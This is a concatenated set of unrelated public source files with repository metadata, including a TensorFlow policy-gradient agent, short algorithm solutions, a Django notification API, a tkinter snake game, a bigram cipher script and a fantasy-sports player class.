import tensorflow as tf
class PolicyGradient:
def __init__(self, min_action, max_action, feature_size,
hidden_units=10, learning_rate=0.01, gamma=0.95, tf_log_dir=None):
self.min_action = min_action
self.max_action = max_action
self.feature_size = feature_size
self.hidden_units = [hidden_units] if isinstance(hidden_units, int) else hidden_units
self.lr = learning_rate
self.gamma = gamma
self.step_counter = 0
self.log_writer = None
self._build_network()
self.sess = tf.Session()
self.sess.run(tf.global_variables_initializer())
self.ep_states = []
self.ep_actions = []
self.ep_rewards = []
if tf_log_dir:
self.log_writer = tf.summary.FileWriter(tf_log_dir, self.sess.graph)
def _build_network(self):
self.s_pl = tf.placeholder(tf.float32, [None, self.feature_size], name="s")
self.a_pl = tf.placeholder(tf.float32, [None], name="a")
self.v_pl = tf.placeholder(tf.float32, [None], name="v_discounted")
if len(self.hidden_units) == 1:
out = tf.layers.dense(self.s_pl, self.hidden_units[0],
activation=tf.nn.relu, name="hidden")
else:
out = self.s_pl
for (i, hidden_unit) in enumerate(self.hidden_units):
out = tf.layers.dense(out, hidden_unit,
activation=tf.nn.relu, name="hidden_{:d}".format(i))
with tf.variable_scope("out"):
self.mu = tf.squeeze(tf.layers.dense(out, units=1), name="mu")
self.sigma = tf.squeeze(tf.layers.dense(out, units=1, activation=tf.nn.softplus), name="sigma")
self.dist = tf.distributions.Normal(loc=self.mu, scale=self.sigma+0.001)
self.action = tf.clip_by_value(
self.dist.sample(sample_shape=1), self.min_action, self.max_action)
with tf.variable_scope("loss"):
self.loss = -self.dist.log_prob(self.action)*self.v_pl - 0.01*self.dist.entropy()
with tf.variable_scope("train"):
self.train_op = tf.train.AdamOptimizer(self.lr).minimize(self.loss)
def choose_action(self, s):
if len(s.shape) == 1:
s = s[np.newaxis, :]
return self.sess.run(self.action, feed_dict={self.s_pl: s})
def store_transition(self, s, a, r):
self.ep_states.append(s)
self.ep_actions.append(a)
self.ep_rewards.append(r)
def learn(self):
discounted_r = self._discounted_rewards()
self.sess.run(self.train_op, feed_dict={
self.s_pl: np.vstack(self.ep_states), # shape=[None, n_obs]
self.a_pl: np.array(self.ep_actions).reshape([-1]), # shape=[None, ]
self.v_pl: discounted_r, # shape=[None, ]
})
self.ep_states, self.ep_actions, self.ep_rewards = [], [], []
# return discounted_ep_rs_norm
def _discounted_rewards(self):
discounted_ep_rs = np.zeros_like(self.ep_rewards)
running_add = 0
for t in reversed(range(0, len(self.ep_rewards))):
running_add = running_add * self.gamma + self.ep_rewards[t]
discounted_ep_rs[t] = running_add
# normalize episode rewards
discounted_ep_rs -= np.mean(discounted_ep_rs)
discounted_ep_rs /= np.std(discounted_ep_rs)
return discounted_ep_rs
| zengxy/rl_exercise | learner/PolicyGradient_Continuous.py | PolicyGradient_Continuous.py | py | 3,465 | python | en | code | 0 | github-code | 13 |
20244910544 | import sys
n=int(sys.stdin.readline())
s=[]
for i in range(n):
m=sys.stdin.readline().split()
if m[0]=='push':
s.append(m[1])
elif m[0]=='top':
print(s[-1] if s else -1)
elif m[0]=='pop':
print(s.pop() if s else -1)
elif m[0]=='size':
print(len(s))
elif m[0]=='empty':
print(0 if s else 1) | chaeyeon-yang/Algorithm | new/datastructure/10828.py | 10828.py | py | 322 | python | en | code | 0 | github-code | 13 |
29807397956 | import fcntl
from pathlib import Path
lock_file_path = Path(Path('/tmp') / 'lyrebird.lock')
def place_lock():
'''
Places a lockfile file in the user's home directory to prevent
two instances of Lyrebird running at once.
Returns lock file to be closed before application close, if
`None` returned then lock failed and another instance of
Lyrebird is most likely running.
'''
lock_file = open(lock_file_path, 'w')
try:
fcntl.flock(lock_file, fcntl.LOCK_EX | fcntl.LOCK_NB)
except:
return None
return lock_file
def destroy_lock():
'''
Destroy the lock file. Should close lock file before running.
'''
if lock_file_path.exists():
lock_file_path.unlink()
| lyrebird-voice-changer/lyrebird | app/core/lock.py | lock.py | py | 737 | python | en | code | 1,770 | github-code | 13 |
4818769380 | def dfs(k, graph, visited):
visited[k] = 1
for i in range(len(graph[k])):
if visited[i] == 0 and graph[k][i] == 1:
dfs(i, graph, visited)
def solution(n, computers):
visited = [0] * n
answer = 0
for i in range(n):
if visited[i] == 0:
dfs(i, computers, visited)
answer += 1
return answer
| gilbutITbook/080338 | 12장/네트워크.py | 네트워크.py | py | 367 | python | en | code | 32 | github-code | 13 |
43084839642 | #
# @lc app=leetcode.cn id=653 lang=python3
#
# [653] 两数之和 IV - 输入 BST
#
# @lc code=start
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def findTarget(self, root: Optional[TreeNode], k: int) -> bool:
# 一样的哈希表
num_dict = {}
self.success = False
def writeToDict(node):
# 空或者已经找到则不继续
if not node or self.success:
return
if node.val in num_dict:
self.success = True
return
else:
num_dict[k - node.val] = 1
writeToDict(node.left)
writeToDict(node.right)
writeToDict(root)
return self.success
# @lc code=end
| Guo-xuejian/leetcode-practice | 653.两数之和-iv-输入-bst.py | 653.两数之和-iv-输入-bst.py | py | 900 | python | en | code | 1 | github-code | 13 |
4555187047 |
import json
from datetime import datetime
from dashboard.models import Complaint, Notification, serialize
from dashboard.views.Customers import extractComplaintObj
from django.contrib.auth.decorators import login_required
from django.http import JsonResponse
from django.shortcuts import redirect
@login_required
def notif_api(request):
if request.is_ajax():
now = datetime.now()
qs = Notification.objects.filter(active=True).values(
'msg', 'created_at').order_by('-created_at')
for q in qs:
timediff = now - q['created_at']
q['created_at'] = get_days(timediff.total_seconds())
return JsonResponse({"data": list(qs)}, safe=False)
else:
return redirect("customer_dashboard")
@login_required
def complaint_api(request, slug):
if request.is_ajax():
try:
complaint = Complaint.objects.get(complaint_id=slug)
except:
return JsonResponse({"status": 404}, safe=False)
customer_info = {'name': complaint.customer.user.first_name + " " + complaint.customer.user.last_name,
'email': complaint.customer.user.email,
'contact': complaint.customer.contact}
complaint = json.loads(serialize([complaint]))[0]
return JsonResponse({"status": 200, "data": {**extractComplaintObj(complaint), **customer_info}}, safe=False)
else:
return redirect("login-redirects")
def get_days(ttime):
day = ttime // (24 * 3600)
ttime = ttime % (24 * 3600)
hour = ttime // 3600
if day:
return ("%d days ago" % (day))
else:
return ("%d hrs ago" % (hour))
| avisionx/fms-portal-iiitd | dashboard/views/Common.py | Common.py | py | 1,679 | python | en | code | 0 | github-code | 13 |
38424605822 | from models.template import *
class User(Template):
meta = {
'db_alias': 'youtube',
'collection': 'User'
}
index = {
"id": None
}
fields = {
"id": {"type": "string"},
"name": {"type": "string", "xpath": "//*[@id='text-container']"},
"subscriber_count": {"type": "int", "xpath": "//*[@id='subscriber-count']"},
"view_count": {"type": "int", "xpath": "*[@id='right-column']/yt-formatted-string[3]"},
"description": {"type": "string", "xpath": "//*[@id='description-container']/yt-formatted-string[2]"},
"detail": {"type": "string", "xpath": "//*[@id='details-container']/table"},
"date_joined": {"type": "datetime", "xpath": "//*[@id='right-column']/yt-formatted-string[2]"}
}
connections = {
}
def __new__(cls, *args, **kwargs):
return Template.__new__(cls, Class=Template, database=cls.meta["db_alias"], collection=cls.meta["collection"])
def __init__(self, data):
super().__init__(data=data) | t4iv0i/multiplatform_crawler | models/youtube/user.py | user.py | py | 1,033 | python | en | code | 1 | github-code | 13 |
18396323614 | ### SNEK GAME ###
# just another snek game
# -dsplayerX #
#
from tkinter import *
import random
# Game space parameters
GAME_WIDTH = 600
GAME_HEIGHT = 600
SPACE_SIZE = 30
# Starting snake size
BODY_PARTS = 3
# Snake speed parameters
START_SPEED = 120
MAX_SPEED = 20
SPEED_REDUCTION = 2
# Color values for background and subjects
SNAKE_COLOUR = "#333333"
FOOD_COLOUR = "#de0713"
BACKGROUND_COLOR = "#8cb281"
class Snake:
def __init__(self):
self.body_size = BODY_PARTS
self.coordinates = []
self.squares = []
for i in range(0, BODY_PARTS):
self.coordinates.append([0, 0])
for x, y in self.coordinates:
square = canvas.create_rectangle(x + 1.5, y + 1.5, x + SPACE_SIZE - 1.5, y + SPACE_SIZE - 1.5, fill=SNAKE_COLOUR, tag="snake")
self.squares.append(square)
class Food:
def __init__(self):
x = random.randint(0, (GAME_WIDTH / SPACE_SIZE) - 1) * SPACE_SIZE
y = random.randint(0, (GAME_HEIGHT / SPACE_SIZE) - 1) * SPACE_SIZE
self.coordinates = [x, y]
canvas.create_oval(x + 5, y + 5, x + SPACE_SIZE - 5, y + SPACE_SIZE - 5, fill=FOOD_COLOUR, outline=FOOD_COLOUR, tag="food")
def next_turn(snake, food):
global score
global snake_speed
x, y = snake.coordinates[0]
if direction == "up":
y -= SPACE_SIZE
elif direction == "down":
y += SPACE_SIZE
elif direction == "left":
x -= SPACE_SIZE
elif direction == "right":
x += SPACE_SIZE
snake.coordinates.insert(0, (x, y))
square = canvas.create_rectangle(x + 1.5, y + 1.5, x + SPACE_SIZE - 1.5, y + SPACE_SIZE - 1.5, fill=SNAKE_COLOUR, outline=SNAKE_COLOUR)
snake.squares.insert(0, square)
if (x == food.coordinates[0]) and (y == food.coordinates[1]):
score += 1
if snake_speed > MAX_SPEED:
snake_speed -= SPEED_REDUCTION
label.config(text="Score: {} ".format(score))
canvas.delete("food")
food = Food()
else:
del snake.coordinates[-1]
canvas.delete(snake.squares[-1])
del snake.squares[-1]
if check_collisions(snake):
global highscore
if score > highscore:
highscore = score
window.after(350) # showing snake crash for a brief time
game_over()
window.after(3000, start_game)
else:
window.after(snake_speed, next_turn, snake, food)
def change_direction(new_direction):
global direction
if new_direction == 'left':
if direction != 'right':
direction = new_direction
elif new_direction == 'right':
if direction != 'left':
direction = new_direction
elif new_direction == 'up':
if direction != 'down':
direction = new_direction
elif new_direction == 'down':
if direction != 'up':
direction = new_direction
def check_collisions(snake):
x, y = snake.coordinates[0]
if x < 0 or x >= GAME_WIDTH:
return True
elif y < 0 or y >= GAME_HEIGHT:
return True
for body_part in snake.coordinates[1:]:
if x == body_part[0] and y == body_part[1]:
return True
def game_over():
global score
global highscore
canvas.delete(ALL)
canvas.create_text(canvas.winfo_width()/2, canvas.winfo_height()/3.5, font=("arial", 60, "bold"), text="GAME OVER!", fill="#de0713", tag="gameover")
canvas.create_text(canvas.winfo_width()/2, canvas.winfo_height()/2, font=("arial", 36), text="Your Score: {}".format(score), fill="#C8FCEA", tag="yourscore")
canvas.create_text(canvas.winfo_width()/2, canvas.winfo_height()/1.5, font=("arial", 24), text="High Score: {}".format(highscore), fill="#ffe044", tag="highscore")
canvas.create_rectangle(200, 485,400,540, fill="#333333", outline="black")
canvas.create_text(canvas.winfo_width()/2, canvas.winfo_height()/1.2, font=("arial", 14), text="Game will restart in... ", fill="white", tag="gamestart")
gamestartcount = canvas.create_text(canvas.winfo_width()/2, canvas.winfo_height()/1.15, font=("arial", 14), text="", fill="white", tag="gamestartcount")
count_string = "3 2 1"
#Time delay in milliseconds
delta = 500
delay = 0
for i in range(len(count_string) + 1):
s = count_string[:i]
update_text = lambda s=s: canvas.itemconfigure(gamestartcount, text=s)
canvas.after(delay, update_text)
delay += delta
def start_game():
global score
global direction
global snake_speed
canvas.delete(ALL)
# Setting game restart values
snake_speed = START_SPEED
score = 0
direction = 'down'
label.config(text="Score: {}".format(score))
snake = Snake()
food = Food()
next_turn(snake, food)
def stop_game():
window.destroy()
window = Tk()
window.title("Snek Game")
window.resizable(False, False)
# Setting game start values
snake_speed = START_SPEED
score = 0
highscore = 0
direction = 'down'
# Score Label on top
label = Label(window, text="Score: {} ".format(score), font=('arial', 36))
label.pack()
# Quit Button
button = Button(window, text= "Quit", font=("arial",12), command=stop_game, bg="#333333", fg="#F5F5F5")
button.place(x = 520, y = 15)
canvas = Canvas(window, bg=BACKGROUND_COLOR, height=GAME_HEIGHT, width=GAME_WIDTH)
canvas.pack()
window.update()
window_width = window.winfo_width()
window_height = window.winfo_height()
screen_width = window.winfo_screenwidth()
screen_height = window.winfo_screenheight()
x = int((screen_width/2) - (window_width/2))
y = int((screen_height/2) - (window_height/2))
window.geometry(f"{window_width}x{window_height}+{x}+{y}")
# Keybinds
window.bind('<Up>', lambda event: change_direction('up'))
window.bind('<Down>', lambda event: change_direction('down'))
window.bind('<Left>', lambda event: change_direction('left'))
window.bind('<Right>', lambda event: change_direction('right'))
# Alternate Keybinds
window.bind('<w>', lambda event: change_direction('up'))
window.bind('<s>', lambda event: change_direction('down'))
window.bind('<a>', lambda event: change_direction('left'))
window.bind('<d>', lambda event: change_direction('right'))
start_game()
window.mainloop() | dsplayerX/Snek-Game | snek.py | snek.py | py | 6,295 | python | en | code | 0 | github-code | 13 |
2883610088 | from absl.testing import absltest
from absl.testing import parameterized
import flax
import jax
import numpy as np
from sam.sam_jax.models import load_model
class LoadModelTest(parameterized.TestCase):
# Parametrized because other models will be added in following CLs.
@parameterized.named_parameters(
('WideResnet_mini', 'WideResnet_mini'),
('WideResnet_ShakeShake_mini', 'WideResnet_ShakeShake_mini'),
('Pyramid_ShakeDrop_mini', 'Pyramid_ShakeDrop_mini'))
def test_CreateModel(self, model_name: str):
model, state = load_model.get_model(model_name, 1, 32, 10)
self.assertIsInstance(model, flax.nn.Model)
self.assertIsInstance(state, flax.nn.Collection)
fake_input = np.zeros([1, 32, 32, 3])
with flax.nn.stateful(state, mutable=False):
logits = model(fake_input, train=False)
self.assertEqual(logits.shape, (1, 10))
@parameterized.named_parameters(
('WideResnet28x10', 'WideResnet28x10'),
('WideResnet28x6_ShakeShake', 'WideResnet28x6_ShakeShake'),
('Pyramid_ShakeDrop', 'Pyramid_ShakeDrop'))
def test_ParameterCount(self, model_name: str):
# Parameter count from the autoaugment paper models, 100 classes:
reference_parameter_count = {
'WideResnet28x10': 36278324,
'WideResnet28x6_ShakeShake': 26227572,
'Pyramid_ShakeDrop': 26288692,
}
model, _ = load_model.get_model(model_name, 1, 32, 100)
parameter_count = sum(np.prod(e.shape) for e in jax.tree_leaves(model))
self.assertEqual(parameter_count, reference_parameter_count[model_name])
if __name__ == '__main__':
absltest.main()
| google-research/sam | sam_jax/models/load_model_test.py | load_model_test.py | py | 1,617 | python | en | code | 492 | github-code | 13 |
25240501376 | from itertools import count as count_from
LANGUAGE = {
'А': 0, 'Б': 1, 'В': 2, 'Г': 3,
'Д': 4, 'Е': 5, 'Ж': 6, 'З': 7,
'И': 8, 'К': 9, 'Л': 10, 'М': 11,
'Н': 12, 'О': 13, 'П': 14, 'Р': 15,
'С': 16, 'Т': 17, 'У': 18, 'Ф': 19,
'Х': 20, 'Ц': 21, 'Ч': 22, 'Ш': 23,
'Щ': 24, 'Ъ': 25, 'Ы': 26, 'Ь': 27,
'Э': 28, 'Ю': 29, 'Я': 30,
}
def str_to_append(_str):
if len(_str) == 1:
return '00' + _str
if len(_str) == 2:
return '0' + _str
if len(_str) == 3:
return _str
def build_array():
count = count_from(1)
array = [[next(count) for i in range(1, 32)] for i in range(0, 31)]
for i in range(len(array)):
for j in range(len(array[i])):
array[i][j] = str_to_append(str(array[i][j]))
return array
def combine_word(_word):
result = []
intermediate = ''
for i in range(len(_word)):
if len(_word) % 2 != 0 and i + 1 == len(_word):
intermediate += _word[i] + 'Я'
result.append(intermediate)
break
intermediate += _word[i]
if ((i + 1) % 2) == 0:
result.append(intermediate)
intermediate = ''
return result
def encrypt(combined, table):
result = ''
for letters in combined:
result += table[LANGUAGE[letters[0]]][LANGUAGE[letters[1]]] + ' '
return result
def decrypt(cipher, table):
result = ''
find_str = cipher.split(' ')
for find_value in find_str:
for i, value_i in enumerate(table):
for j, value_j in enumerate(table[i]):
if find_value == value_j:
for letter in LANGUAGE:
if LANGUAGE[letter] == i: result += letter
for letter in LANGUAGE:
if LANGUAGE[letter] == j: result += letter
return result
if __name__ == '__main__':
print('Enter the word')
_word = input()
_word = _word.upper()
_word = _word.replace('Ё', 'Е')
_word = _word.replace('Й', 'И')
print('Encrypt:')
table = build_array()
combined_word = combine_word(_word)
print(encrypt(combined_word, table))
print('Decrypt:')
print('Enter the cipher:')
cipher = input()
print(decrypt(cipher, table))
| RMalsonR/Crypt | Block Ciphers/bigram_cipher_ports.py | bigram_cipher_ports.py | py | 2,304 | python | en | code | 0 | github-code | 13 |
8036345543 | #!/usr/bin/python3
""" Fewest coins for change"""
def makeChange(coins, total):
""" fewest number of coins to meet total """
if total <= 0:
return 0
coins.sort(reverse=True)
change = 0
for coin in coins:
if total <= 0:
break
remainder = total // coin
change += remainder
total -= (remainder * coin)
if total != 0:
return -1
return change
| Muna-Redi/alx-interview | 0x08-making_change/0-making_change.py | 0-making_change.py | py | 431 | python | en | code | 0 | github-code | 13 |
2055340453 | import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
arr = np.array([1,2,3,4,5])
print(arr)
print(type(arr))
#no different between tuple and list
arr = np.array((1, 2, 3, 4, 5))
print(arr)
print(type(arr))
#Scalar or 0-D arrays
scalar = np.array(42)
print(scalar)
print(type(scalar))
#Create a 1D array from a list
arr1=np.array([1,2,3,4,5])
print(arr1)
#Create a 2D array from a list of lists
arr2= np.array([[1,2,3],[4,5,6]])
print(arr2)
#create 1-D array of zeros with length 5
zeros_array= np.zeros(5)
print(zeros_array)
#create a 2-Darray of ones with shape( 3,4)
ones_arr = np.ones((3,4))
print(ones_arr)
#create a 1D array of integers from 0 to 4
int_arr = np.arange(5)
print(int_arr)
#get the first element of arr
x=arr1[0]
print(x)
#get the first row of arr
row = arr2[0,:]
print(row)
#set the second element of arr to 10
arr2[1] = 10
print(arr2)
#create a matrix using numpy.matrix()
mat1 = np.matrix([[1,2], [3,4]])
print(mat1)
#create a matrix using numpy.array() with dtype = ‘object’
mat2 = np.array([[1,2],[3,4]], dtype = 'object')
print(mat2)
#create a matrix using numpy.array() and cast it as a matrix
mat3 = np.array([[1,2],[3,4]]).astype(np.matrix)
print(mat3)
#check dimension of array
arr = np.array([1,2,3, 4, 5])
print(arr.ndim)
#to shape using ndim
arr = np.array([1,2,3, 4, ], ndmin=5)
print(arr)
#reshape
a= np.array([1, 2, 3, 4, 5, 6])
b=a.reshape((2,3))
print(b)
new_arr= a.reshape(2,3,-1)
print(new_arr)
#flatten array
arr= np.array([[1,2,3], [4,5,6]])
print(arr)
#flatten the array using flatten() method
flat_arr = arr.flatten()
print("Original array:")
print( arr)
print("flattened array: ")
print(arr)
# flatten array using ravel() method
import numpy as np
arr= np.array([[1,2,3], [4,5,6]])
#flatten the array
flat_arr = arr.ravel()
print("Original array: ")
print( arr)
print("flattened array: ")
print(arr)
#create a 2D array
arr = np.array([[1, 2, 3], [4, 5, 6]])
#iterate over the elements using a for loop
for i in range(arr.shape[0]):
for j in range(arr.shape[1]):
print(arr[i][j])
#Iterate over the element using nditer()
for element in np.nditer(arr):
print(element)
#iterate over the elements and their indices using ndenumerate()
for index, element in np.ndenumerate(arr):
print(index, element)
#join two array using concatenate() method
#create two array
arr1 = np.array([[1,2], [3,4]])
arr2=np.array([[5,6]])
#concatenate the arrays along axis 0
result = np.concatenate((arr1,arr2), axis=0)
print( result)
#join two array using stack() method
#create two array
arr1 = np.array([1,2,3])
arr2=np.array([4,5,6])
#stack the arrays along new axis
result = np.stack((arr1,arr2), axis=0)
print( result)
#search inside array using where
#create an array
arr = np.array([1, 2, 3, 4, 5, 6])
#find the indices of elements
indices = np.where( arr==2)
print(indices)
#search inside array using searchsorted
#create a sorted array
arr = np.array([1, 2, 3, 4, 5, 6])
#find the index where the value 3 should be inserted
index = np.searchsorted(arr,3)
print(index)
#sort array using sort() method
#create an array
arr = np.array([3, 1, 4, 2, 5])
#sort the array in ascending order
arr.sort()
print(arr)
#sort array using sort() method and choose the axis
#create an array
arr = np.array([[3, 2, 1], [4, 6, 5]])
#sort the array in ascending order
arr.sort(axis=0)
print(arr)
#sort array using argsort()
#create an array
arr = np.array([3, 1, 4, 2, 5])
#get the indices that would sort the array
indices = np.argsort(arr)
print(indices)
#sort the array using the indices
sorted_arr = arr[indices]
print(sorted_arr)
#filtring array
#example1,
arr= np.array([41,42,43,44])
#create empty list
filter_arr=[]
#go through each element in arr
for element in arr:
#if the element is higher than 42, set the value to True, otherwise False:
if element > 42:
filter_arr.append(True)
else:
filter_arr.append(False)
new_arr= arr[ filter_arr]
print(new_arr)
#example 2: filter directly
arr = np.array([41, 42, 43, 44])
filter_arr = arr>42
print(arr)
#example3,
arr = np.array([1,2,3,4,5,6,7])
#create an empty list
filter_arr = []
#go through each element in arr
for element in arr:
#if the element is completely divisible by 2, set the value to True, otherwise False
if element%2 == 0:
filter_arr.append(True)
else:
filter_arr.append(False)
new_arr = arr[filter_arr]
print(new_arr)
#example4 :
arr = np.array([1, 2, 3, 4, 5, 6, 7])
filter_arr = arr %2 ==0
new_arr = arr[filter_arr]
print(new_arr)
#random using numpy.random.rand
random_array = np.random.rand(3,3)
print(random_array)
#random using numpy.random.randn
random_array = np.random.randn(3,3)
print(random_array)
#random using numpy.random.randint
random_array = np.random.randint(1, 10, size=(3,3))
print( random_array)
#example2 ,
from numpy import random
x= random.randint(100)
print(x)
#random using choice() method
#example1: generate a random sample of size 3 from an array
a = np.array([1, 2, 3, 4, 5])
random_sample = np.random.choice(a, size=3)
print(random_sample) #output: [2 5 4]
#Example 2: Generate a random sample of size 3 without replacement
a = np.array([1, 2, 3, 4, 5])
random_sample = np.random.choice(a, size = 3, replace= False)
print( random_sample) #output: [3 1 4]
#Example 3: Generate a random sample of size 3 with custom probabilities
a= np.array([1, 2, 3, 4, 5])
p = [0.1, 0.2, 0.3, 0.2, 0.2] #probabilities associated with each element in a
random_sample = np.random.choice(a, size=3, replace= False, p=p)
print(random_sample) #output : [ 2 1 3]
#data distribution
#uniform distribution
random_numbers = np.random.uniform(low=0, high=1, size=(3,3))
print(random_numbers)
random_numbers = np.random.uniform(low=0, high=1, size=10000)
sns.distplot(random_numbers, hist = False)
plt.title('uniform Distribution of random numbers')
plt.show()
#normal distribution
random_numbers = np.random.normal(loc=0, scale=1, size=(3,3))
print(random_numbers)
random_numbers = np.random.normal(loc=0, scale=1, size=10000)
sns.distplot(random_numbers, hist = False)
plt.title('normal Distribution of random numbers')
plt.show()
#binomial distribution
random_numbers = np.random.binomial(n=10, p=0.5, size=(3,3))
print(random_numbers)
random_numbers = np.random.binomial(n=10, p=0.5, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('binomial Distribution of random numbers')
plt.show()
#difference between normal and binomial distribution :
sns.kdeplot(np.random.normal(loc=0, scale=1, size=100000), label="normal distribution")
sns.kdeplot(np.random.binomial(n=4, p=0.5, size = 100000), label="binomial distribution")
plt.title("Difference between normal and binomial distribution")
plt.legend()# print names
plt.show()
#poisson distribution
random_numbers = np.random.poisson(lam=5, size=(3,3))
print(random_numbers)
random_numbers = np.random.poisson(lam=5, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('poisson Distribution of random numbers')
plt.show()
#difference between normal and poisson distribution
sns.distplot(random.normal(loc=0, scale=1, size=100000), hist=False, label="normal distribution")
sns.distplot(random.poisson(lam=5, size = 100000), hist= False, label= "poisson distribution")
plt.title("difference between normal and poisson distribution")
plt.legend()
plt.show()
#difference between poisson and binomial distribution
sns.distplot(np.random.binomial(n=4, p=0.5, size= 100000), hist=False, label= "binomial distribution")
sns.distplot(np.random.poisson(lam=5, size= 100000), hist=False, label="poisson distribution")
plt.title("difference between poisson and binomial distribution")
plt.legend()
plt.show()
#logistic distribution
#set the parameter of the logistic distribution
m = 5.0 # location parameter
s = 1.0# scale parameter
#generate a logistic distribution with 1000 samples
samples = np.random.logistic(m,s, size= 1000)
print("this is logistic distribution :", samples)
#plot a histogram of the samples
plt.hist(samples, bins=50, density= True)
sns.distplot(samples, hist=False, label='Logistic distribution')
plt.title("Logistic distribution")
plt.xlabel("x-axis")
plt.ylabel("Density")
plt.legend()
plt.show()
plt.show()
#different between normal and logistic distribution
sns.distplot(random.normal(scale=2, size=1000), hist = False, label = "Normal distribution")
sns.distplot(random.logistic(size =1000), hist=False, label="Logistic distribution")
plt.title("Difference between Normal and Logistic distribution")
plt.xlabel("x-axis")
plt.ylabel("Density")
plt.legend()
plt.show()
#multinomial distribution
n_trials =10
pvals = [0.2, 0.3, 0.5]
n_samples = 5
samples= np.random.multinomial(n=n_trials, pvals=pvals, size= n_samples)
print("multinomial distribution : ", samples)
fig, ax = plt.subplots()
ax.bar(range(len(pvals)), samples[0], label="Sample 1")
ax.bar(range(len(pvals)), samples[1], bottom=samples[0], label="Sample2")
ax.bar(range(len(pvals)), samples[2], bottom=samples[0]+samples[1], label="Sample3")
ax.bar(range(len(pvals)), samples[3], bottom=samples[0]+samples[1]+samples[2], label="Sample4")
ax.bar(range(len(pvals)), samples[4], bottom=samples[0]+samples[1]+samples[2]+samples[3], label="Sample5")
ax.set_xticks(range(len(pvals)))
ax.set_xticklabels(["Outcome1", "Outcome2", "Outcome3"])
ax.set_xlabel("Outcomes")
ax.set_ylabel("Counts")
ax.set_title(f"Multinomial Distribution (n={n_trials}, p={pvals}, samples={n_samples})")
ax.legend()
plt.show()
#Ray leigh distribution
sigma = 2
n_samples=1000
samples = np.random.rayleigh(scale=sigma, size=n_samples)
fig , ax = plt.subplots()
ax.hist(samples, bins=30, density= True)
ax.set_xlabel("x")
ax.set_ylabel("Probability density function ")
ax.set_title(f"Rayleigh distribution ( sigma={sigma}, samples={n_samples})")
plt.show()
sns.distplot(np.random.rayleigh(size=1000), hist= False)
plt.title("Rayleigh distribution")
plt.xlabel("X-axis")
plt.ylabel("Density")
plt.show()
#perato distribution
samples = np.random.pareto(a=3, size=1000)
print("Mean: ", np.mean(samples))
print("Median:", np.median(samples))
print("Standard deviation:", np.std(samples))
plt.hist(samples, bins=50, density=True, alpha=0.5)
x=np.linspace(0.01, 10, 1000)
y = 3 * (x**(-4))
plt.plot(x,y,'r-', lw=2)
plt.xlabel("x")
plt.ylabel("Probability density")
plt.title("Pareto distribution with shape parameter a=3")
plt.show()
#zipf distribution
samples = np.random.zipf(a=2, size=1000)
print("Mean:", np.mean(samples))
print("Median: ", np.median(samples))
print("Standard deviation: ", np.std(samples))
samples = np.random.zipf(a=2, size=1000)
values, counts = np.unique(samples, return_counts=True)
freqs = counts/len(samples)
fig, ax = plt.subplots()
ax.loglog(values, freqs, 'bo')
ax.set_xscale('log', base=2)
ax.set_yscale('log', base=10)
plt.xlabel("Rank")
plt.ylabel("Frequency")
plt.title("Zipf distribution with shape parameter a=2")
plt.show()
#exponential distribution
random_numbers = np.random.exponential(scale=2, size=(3,3))
print(random_numbers)
random_numbers = np.random.exponential(scale=2, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('exponential Distribution of random numbers')
plt.show()
#gamma distribution
random_numbers = np.random.gamma(shape=2, scale=2, size=(3,3))
print(random_numbers)
random_numbers = np.random.gamma(shape=2, scale=2, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('gamma Distribution of random numbers')
plt.show()
#beta distribution
random_numbers = np.random.beta(a=2, b=5, size=(3,3))
print(random_numbers)
random_numbers = np.random.beta(a=2, b=5, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('beta Distribution of random numbers')
plt.show()
#chi square distribution
random_numbers= np.random.chisquare( df=3, size=(3,3))
print(random_numbers)
random_numbers= np.random.chisquare( df=3, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('chi square Distribution of random numbers')
plt.show()
#geometric distribution
random_numbers= np.random.geometric( p=0.5, size=(3,3))
print(random_numbers)
random_numbers= np.random.geometric( p=0.5, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('geometric Distribution of random numbers')
plt.show()
#weibull distribution
random_numbers= np.random.weibull( a=2, size=(3,3))
print(random_numbers)
random_numbers= np.random.weibull( a=2, size=100000)
sns.distplot(random_numbers, hist = False)
plt.title('weibull Distribution of random numbers')
plt.show()
#permutation
arr = np.arange(5)
permutations = np.random.permutation(arr)
print("original array:", arr)
print("permutation: ", permutations)
#shuffle
arr = np.arange(5)
shuf = np.random.shuffle(arr)
print("shuffled array:", arr)
#universal function
x = np.linspace(0,2*np.pi, 100)
y = np.sin(x)
print(y)
# trigno
arr = np.array([np.pi/2, np.pi/3, np.pi/4, np.pi/5])
y= np.sin(arr)
plt.plot(arr, y)
plt.xlabel("angle(radian)")
plt.ylabel("sine")
plt.title("sine wave")
plt.show()
| hatimbenjebara/numpy_in_python | numpy_lib.py | numpy_lib.py | py | 13,365 | python | en | code | 1 | github-code | 13 |
2609945827 | from random import randint
b = randint(1, 6)
a = input("Do you want to roll the die: ")
while (a=="yes"):
b = randint(1, 6)
print("Dice rolling...")
print(b,"\n")
a = input("Do you want to roll the die: ")
print("Thanks for playing")
| Aadhithr/Personal | PythonWork/PythonCourse/homework/uses_random/diceSimulator.py | diceSimulator.py | py | 257 | python | en | code | 0 | github-code | 13 |
7067614679 | from draftfast.orm import Player
from typing import Optional
from copy import deepcopy
class ShowdownPlayer(Player):
def __init__(
self,
player: Player,
captain: bool = False,
pos: Optional[str] = None
):
for k, v in player.__dict__.items():
if hasattr(self, k) or k.startswith('__'):
continue
setattr(self, k, deepcopy(v))
if captain:
self.real_pos = self.pos
self.pos = 'CPT'
self.captain = True
else:
if pos:
self.pos = pos
self.real_pos = pos
else:
self.real_pos = self.pos
self.pos = 'FLEX'
self.captain = False
@property
def formatted_position(self):
return '{} ({})'.format(self.pos, self.real_pos)
@property
def is_captain(self):
return self.pos == 'CPT'
@property
def roster_id(self):
"""
Used for roster equality.
Unlike classic, position matters in showdown at CPT level.
"""
return f'{self.name} {self.team} {self.is_captain}'
@property
def v_avg(self):
"""
Normalize average comparison for captain.
"""
if self.is_captain:
return self.proj / 1.5 - self.average_score
return self.proj - self.average_score
| sam1rm/draftfast | draftfast/showdown/orm.py | orm.py | py | 1,406 | python | en | code | null | github-code | 13 |
22337977927 | #!/bin/env python
import random, redis
